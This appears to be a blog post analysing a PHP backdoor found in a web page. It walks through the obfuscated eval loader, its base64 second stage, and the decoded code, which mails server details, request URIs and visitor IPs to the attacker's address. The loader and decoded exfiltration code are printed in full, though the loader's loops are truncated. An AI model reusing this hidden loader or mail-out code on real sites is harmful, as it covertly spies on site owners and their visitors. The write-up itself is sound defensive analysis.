This is automatically executed on every request of the page where it is hooked.
It automatically executes with a default string provided. The string is encoded in a simple algorithm.
Which is decodes easily. Encoding is probably for hiding the content his e-mail address etc. from inexperienced eyes.
function d($s, $k=''){
if($k==''){
for($i=0;$i
$i=(float)($i)+2;
}
return $d;
}else{
$r='';$f=d('6261736536345f6465636f6465');$u=$f('Z3ppbmZsYXRl');$s=$u($f($s));
for($i=0;$i
}
return $r;
}
}
eval(d("VZL7TuJAGMUfbfcV1HUJoMnakVvqLUqhpVNoYVpmaBvRXul0hqq0XOpGH3HR7CbuvyfnJL/zfYdGtTov8jSv/VzXj3p \
Gr3K8ub4STo7HqFKl+Span1aKXwd3unRY2d5cs0eeh/WT94im1Wq1dvleXS55eHh98EODRvmAZcFrwCtnqZWONRPslsnnQGS2mf \
AZacvhdFvgZ+ohhhtmKsnB0iAou6PojbzMqbo1TJiPty2oSZNXx3H5PQAbW8H5pORpcN5fuu6zqKeiMaBcHEqktInN4yWg9pmjE \
IGqVt9JNGul97hJ50TnhqmtogHZGLSzgbzF7gVdtrirYr5bmvJkitUL1Rb0qQrATpNvTIRVYtqabwhQtjBRMSARxirUmqCj3wqa \
qrRZQJx4bN5tfU2KKW4lHsGrobWLocK2UAGLB4AFm7RbQ8lAaCqMyYDE2EJ9i+67lXLqzW7Lf75H5eItUoymTSYs5MkXvvL/LAe \
f2aAxpT7vinoXxZZAMGEuImWgEtWc3J8lYwugF3vP0ptkLHCNTJeExYCXO8Q0E1nZQoNakgAceBnZOaTNVKXXhrK5nmPAidKW45 \
myCBrDD42mpJv4DeMp5G+FiW8/tOekv1ujD+Ze8dlX512WKCHzS3jRnxSpk6mbAO/5Uqf0zoEIJb2Ag6D0XbTWmRiTV8BH9O/fe \
ItOFbTxzssepGI6AyMZP7myw/IMyeYMyzcDC4ym+9uvddqk+hboAdGefClefNnaBu53EBL1ZSR32YLomSZ1Mzcz1r6Zdo5vjqLf \
j7zmeUXSaYZBFGRhfFrhqziq1y6/f4t3WX75Bw==", 1235327122));
----------------------------------------------------------------------
b) The above fuction with name "d", is called by eval to decode the provided string. The function eval
executes the resulting output. The resulting output is shown below. It has another string value
of $lmge which is, in this case base64 encoded. Follow, the next steps.
if((isset($v) AND $v==0) OR (isset($t) AND $t==false)){
die(\'\');
}
$lmge = \"JGNyZWF0b3I9YmFzZTY0X2RlY29kZSgiWW1GdUxtUmhaMlV3TjBCbmJXRnBiQzVqYjIwPSIpOw0KKCRzY \
WZlX21vZGUpPygkc2FmZXo9Ik9OIik6KCRzYWZlej0iT0ZGX0hFSEUiKTsNCiRiYXNlPSJodHRwOi8vIi4kX1NFUlZFUlsnSFRU \
UF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107IA0KJG5hbWUgPSBwaHBfdW5hbWUoKTsgJGlwID0gZ2V0ZW52KCJSRU1 \
PVEVfQUREUiIpOyAkaXAyID0gZ2V0aG9zdGJ5YWRkcigkX1NFUlZFUltSRU1PVEVfQUREUl0pOyAkc3ViaiA9ICRfU0VSVkVSWy \
dIVFRQX0hPU1QnXTsgDQokbXNnID0gIlxuQkFTRTogJGJhc2VcbnVuYW1lIGE6ICRuYW1lXG5CeXBhc3M6ICRieXBhc3NlclxuS \
VA6ICRpcFxuSG9zdDogJGlwMiAkcHdkcyI7DQokZnJvbSA9IkZyb206ICIuJHdyaXQuIl9fXz0iLiRzYWZlei4iPHRvb2xAIi4k \
X1NFUlZFUlsnSFRUUF9IT1NUJ10uIj4iOw0KbWFpbCggJGNyZWF0b3IsICRzdWJqLCAkbXNnLCAkZnJvbSk7\";
eval(base64_decode($lmge));
exit;
----------------------------------------------------------------------
c)- Now, this time above base64 encoded string with name "$lmge", in turn creates the following code and
auto-sends an e-mail.
$creator=base64_decode("YmFuLmRhZ2UwN0BnbWFpbC5jb20=");
($safe_mode)?($safez="ON"):($safez="OFF_HEHE");
$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$name = php_uname();
$ip = getenv("REMOTE_ADDR");
$ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]);
$subj = $_SERVER['HTTP_HOST'];
$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds";
$from ="From: ".$writ."___=".$safez."";
mail( $creator, $subj, $msg, $from);
But where the values of $v, $t, $safez, $bypasser and $writ came from is not clear. Probably some other
missing functions providing the values. Not important. What it does as a whole, is very clear and not
respectable, at all.
------------------------------------------------------------------------
d- Finally an e-mail is sent to the value of variable $creator. Which is again base64 encoded and
dissolves as ban.dage07@gmail.com
What is being sent form your system to ban.dage07@gmail.com are:
1- IP number of your server.
2- Domain name (if hosting multiple domains)
3- The URI which was given in order to access this page. If your client/customer sent you any data via
GET method, all is captured. So, this hacker is spying also.
4- The version of your system
5- The IP number of your visitor who is currently accessing this page
6- The host name of your visitor who is currently accesing this page
7- And finally some more critical information whether php safe mode is ON or OFF.
Tidak ada komentar:
Posting Komentar